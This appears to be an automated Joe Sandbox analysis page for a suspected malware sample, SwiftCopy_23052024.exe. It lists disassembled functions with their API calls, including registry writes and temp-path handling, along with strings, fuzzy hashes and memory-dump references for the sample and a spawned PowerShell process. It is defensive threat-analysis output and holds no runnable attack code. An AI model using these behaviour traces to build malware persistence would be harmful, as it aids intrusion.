Associated: 00000000.00000002.1236550408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236654576.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SwiftCopy_23052024.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 293b16a89cf435d1cc8037f7ddf92d5807eafc3a91d9db64bada208633085da3
Instruction ID: 7420f511cdb836142555688b3451de143ce73197971a19baf3312835e895797a
Opcode Fuzzy Hash: 293b16a89cf435d1cc8037f7ddf92d5807eafc3a91d9db64bada208633085da3
Instruction Fuzzy Hash: 0411DA736441283BEB10657D9C45EAF3298DB86374F260237FA26F31D1E979CC2251E8

Function 0040243D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(cyanitic\srgetogene\runna,00000023,?,00000000,00000002,00000011,00000002), ref: 00402488
RegSetValueExA.ADVAPI32(?,?,?,?,cyanitic\srgetogene\runna,00000000,?,00000000,00000002,00000011,00000002), ref: 004024C5
RegCloseKey.ADVAPI32(?,?,?,cyanitic\srgetogene\runna,00000000,?,00000000,00000002,00000011,00000002), ref: 004025A9

Strings

cyanitic\srgetogene\runna, xrefs: 00402479, 0040249B, 004024AF, 004024BA

Memory Dump Source

Source File: 00000000.00000002.1236581186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1236550408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236654576.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SwiftCopy_23052024.jbxd

Similarity

API ID: CloseValuelstrlen
String ID: cyanitic\srgetogene\runna
API String ID: 2655323295-1362198959
Opcode ID: e7a0e6814c80201edaf2eaeda2033546df8145b8d5b1158786e9808edf03cef6
Instruction ID: d7f14aed55912e39ad141723e2cbb786b74cb62cb57f73557c42781e6368b2a7
Opcode Fuzzy Hash: e7a0e6814c80201edaf2eaeda2033546df8145b8d5b1158786e9808edf03cef6
Instruction Fuzzy Hash: BC119071E00218BEEB01EFA58E49EAE7BB5EB48314F21443BF504B72C1C6F85D419A18

Function 00405985 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\,00403235,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,0040345A,?,00000006,00000008,0000000A), ref: 0040598B
CharPrevA.USER32(?,00000000,?,C:\Users\user~1\AppData\Local\Temp\,00403235,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,0040345A,?,00000006,00000008,0000000A), ref: 00405994
lstrcatA.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 004059A5

Strings

C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405985

Memory Dump Source

Source File: 00000000.00000002.1236581186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1236550408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236654576.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SwiftCopy_23052024.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user~1\AppData\Local\Temp\
API String ID: 2659869361-2382934351
Opcode ID: dfed55a16eab86d89f3af7970decdd3a6c9dbbcd65d2cf450bad9cf681275afb
Instruction ID: 19b991fbecd43d68fcf8fbe3975c191da3a7c8eaa4a3e5077e024cb3b188d11e
Opcode Fuzzy Hash: dfed55a16eab86d89f3af7970decdd3a6c9dbbcd65d2cf450bad9cf681275afb
Instruction Fuzzy Hash: 8DD0A7A21059306AE20266159C09DDB19088F12315B060027F101B2191C63C0D1187FE

Function 00402C2E Relevance: 6.1, APIs: 4, Instructions: 63registryCOMMON

Download Yara Rule

APIs

RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402C93
RegCloseKey.ADVAPI32(?,?,?), ref: 00402C9C
RegCloseKey.ADVAPI32(?,?,?), ref: 00402CBD

Memory Dump Source

Source File: 00000000.00000002.1236581186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1236550408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236654576.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SwiftCopy_23052024.jbxd

Similarity

API ID: Close$Enum
String ID:
API String ID: 464197530-0
Opcode ID: c535ffd0503d7e53353de938b4ef0013261f8bb9891db40cf21ea401e86fa320
Instruction ID: 0ef75652e5200b2c3979a726b87f5b44e9bd6decc27dd8d038d5566faf8c77c7
Opcode Fuzzy Hash: c535ffd0503d7e53353de938b4ef0013261f8bb9891db40cf21ea401e86fa320
Instruction Fuzzy Hash: CC119A32504109FBEF129F90CF09B9E7B6DEB14380F204032BD45B61E0E7B59E11ABA8

Function 00402D60 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,00402F3E,00000001), ref: 00402D73
GetTickCount.KERNEL32 ref: 00402D91
CreateDialogParamA.USER32(0000006F,00000000,00402CDD,00000000), ref: 00402DAE
ShowWindow.USER32(00000000,00000005), ref: 00402DBC

Memory Dump Source

Source File: 00000000.00000002.1236581186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1236550408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236654576.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SwiftCopy_23052024.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 937823a9ca513d21e0cf2f2d626aeb3dfaa269d40a84f5f8bcfb97d910e847a5
Instruction ID: 59a190b5ca5e41810c33fe67e91fb44ed42669482eb3396a028566c2b75ef85f
Opcode Fuzzy Hash: 937823a9ca513d21e0cf2f2d626aeb3dfaa269d40a84f5f8bcfb97d910e847a5
Instruction Fuzzy Hash: 8DF05831941620EBC610AB24BE4CA8E7B74BB04B12711897BF449B11F4CB7C4C828B9C

Function 00405088 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 004050B7
CallWindowProcA.USER32(?,?,?,?), ref: 00405108

Part of subcall function 004040C7: SendMessageA.USER32(00010462,00000000,00000000,00000000), ref: 004040D9

Strings

, xrefs: 00405098

Memory Dump Source

Source File: 00000000.00000002.1236581186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1236550408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236654576.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SwiftCopy_23052024.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: aa27df10419a993b06254c4634be6a0ab58901204a819692472b88ae61f90a6b
Instruction ID: b4a086d39c893e0b6e30c02e44c042f184afa5b73794f50f798247e01a256ddd
Opcode Fuzzy Hash: aa27df10419a993b06254c4634be6a0ab58901204a819692472b88ae61f90a6b
Instruction Fuzzy Hash: 5C018471200609EFDF204F11DD84A6F3665EB84314F208037F605B65D1CB7A8C52AFAD

Function 00403775 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,771B3410,00000000,C:\Users\user~1\AppData\Local\Temp\,0040374D,00403567,?,?,00000006,00000008,0000000A), ref: 0040378F
GlobalFree.KERNEL32(00000000), ref: 00403796

Strings

C:\Users\user~1\AppData\Local\Temp\, xrefs: 00403775

Memory Dump Source

Source File: 00000000.00000002.1236581186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1236550408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236654576.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SwiftCopy_23052024.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user~1\AppData\Local\Temp\
API String ID: 1100898210-2382934351
Opcode ID: d916e2e12d8e8e0e05938552f8e86e2cfc1f8e413d7ca81264c0c58d55c0495e
Instruction ID: 7399a24566e835d4bf74ae8faf6f599a32d3c581d2ea115a227339331e7fa0df
Opcode Fuzzy Hash: d916e2e12d8e8e0e05938552f8e86e2cfc1f8e413d7ca81264c0c58d55c0495e
Instruction Fuzzy Hash: 1BE0C273401120ABC6216F15ED0871A777C6F46B27F02C12BF8407B26087781C434FC8

Function 004059CC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402E30,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SwiftCopy_23052024.exe,C:\Users\user\Desktop\SwiftCopy_23052024.exe,80000000,00000003), ref: 004059D2
CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E30,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SwiftCopy_23052024.exe,C:\Users\user\Desktop\SwiftCopy_23052024.exe,80000000,00000003), ref: 004059E0

Strings

C:\Users\user\Desktop, xrefs: 004059CC

Memory Dump Source

Source File: 00000000.00000002.1236581186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1236550408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236654576.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SwiftCopy_23052024.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-3976562730
Opcode ID: 4402843b33e5109e67992b99d0281bb7e81fac819ebae0ac34b6d7d52c4d849b
Instruction ID: cdf7710bfdc0c04f3d6b4f220b8e9fd9f04d7b2eba678cf51078301a7514d20a
Opcode Fuzzy Hash: 4402843b33e5109e67992b99d0281bb7e81fac819ebae0ac34b6d7d52c4d849b
Instruction Fuzzy Hash: 5AD0C7E2409D705EF30372549D05B9F6A48DF17715F1A0467E181A61A1C67C4D4247BD

Function 00405AEB Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D46,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AFB
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405B13
CharNextA.USER32(00000000,?,00000000,00405D46,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B24
lstrlenA.KERNEL32(00000000,?,00000000,00405D46,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B2D

Memory Dump Source

Source File: 00000000.00000002.1236581186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1236550408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236654576.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SwiftCopy_23052024.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: dddc0b46adaff912d9c321cf48e41736a02eed0190ef2a74250491e495455120
Instruction ID: c1544da0d971e4a519e78892e838bc28cfb462c10397de1a7bf1af1224e2ff03
Opcode Fuzzy Hash: dddc0b46adaff912d9c321cf48e41736a02eed0190ef2a74250491e495455120
Instruction Fuzzy Hash: 9CF06232105418BFC712DFA5DD40D9EBBB8DF56250B2540BAE840F7251D674FE019BA9

Analysis Process: powershell.exePID: 4324, Parent PID: 1464COMMON

Executed Functions

Function 0447F010 Relevance: 1.5, Strings: 1, Instructions: 281COMMON

Download Yara Rule

Strings

\Vzk, xrefs: 0447F2C7

Memory Dump Source

Source File: 00000002.00000002.2188123452.0000000004470000.00000040.00000800.00020000.00000000.sdmp, Offset: 04470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4470000_powershell.jbxd

Similarity

API ID:
String ID: \Vzk
API String ID: 0-3340637352
Opcode ID: a258aa7126fc3ddfe4a4cd6ac7f8e823daff265af0a5f00c5830c3608a8e141e
Instruction ID: 74477dbe4549131638ac6a20f6f455bce9f8c199b62ff920d67cedbbc210c4b1
Opcode Fuzzy Hash: a258aa7126fc3ddfe4a4cd6ac7f8e823daff265af0a5f00c5830c3608a8e141e
Instruction Fuzzy Hash: 90B14E70E00209CFDF24CFA9D9857DEBBF2AF48354F14852AD815A7354EB74A84ACB51

Function 0447F8E0 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2188123452.0000000004470000.00000040.00000800.00020000.00000000.sdmp, Offset: 04470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4470000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67fea694cfa41fd4cba96033e27bc65b5fca6f9b0fca120fd32e759c6256cc25
Instruction ID: d1c9a5792cd54f95fbbb51dcd34f24babb6b217c84277c64e7e3d026c26df282
Opcode Fuzzy Hash: 67fea694cfa41fd4cba96033e27bc65b5fca6f9b0fca120fd32e759c6256cc25
Instruction Fuzzy Hash: 66B13171E00209DFDF24CFA9D9857DEBBF2AF48314F14852AD415A7354EB74A84ACB81

Function 06FE3260 Relevance: 14.6, Strings: 11, Instructions: 884COMMON

Download Yara Rule

Strings

4'q, xrefs: 06FE33B9
4'q, xrefs: 06FE45B9
4'q, xrefs: 06FE4644
4'q, xrefs: 06FE3C08
tPq, xrefs: 06FE3550
tPq, xrefs: 06FE3544
4'q, xrefs: 06FE45C5
4'q, xrefs: 06FE4638
4'q, xrefs: 06FE3BFC
(fl, xrefs: 06FE43DB
(fl, xrefs: 06FE43D1

Memory Dump Source

Source File: 00000002.00000002.2195134649.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6fe0000_powershell.jbxd

Similarity

API ID:
String ID: (fl$(fl$4'q$4'q$4'q$4'q$4'q$4'q$4'q$tPq$tPq
API String ID: 0-324129323
Opcode ID: 9d02b189843a560120d88c01bab2970eb74398f634b88a124ca9cdee3b96436e
Instruction ID: 687e07ea00f777e03c129d7953479f79a1728accdaaf045f8eab836bba923b49
Opcode Fuzzy Hash: 9d02b189843a560120d88c01bab2970eb74398f634b88a124ca9cdee3b96436e
Instruction Fuzzy Hash: 56727F75F002149FDB64CB68C855BAABFB2BB85310F24C4A9D9099F391DB32ED41CB91

Function 06FE8830 Relevance: 10.9, Strings: 8, Instructions: 928COMMON

Download Yara Rule

Strings

(fl, xrefs: 06FE960E
4l, xrefs: 06FE9319
(fl, xrefs: 06FE95F8
4'q, xrefs: 06FE8C76
4'q, xrefs: 06FE8C6A
4l, xrefs: 06FE9303
4'q, xrefs: 06FE9404
4'q, xrefs: 06FE9410

Memory Dump Source

Source File: 00000002.00000002.2195134649.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6fe0000_powershell.jbxd

Similarity

API ID:
String ID: (fl$(fl$4'q$4'q$4'q$4'q$4l$4l
API String ID: 0-3092680642
Opcode ID: 654262bf56317558f2bcc3f5fbd63776b2df2c9bf0edca48e0d146fd5e756077
Instruction ID: b596e9e8241f62101540d91ade770127d9b644baa6296f748ba25b1822730f23
Opcode Fuzzy Hash: 654262bf56317558f2bcc3f5fbd63776b2df2c9bf0edca48e0d146fd5e756077
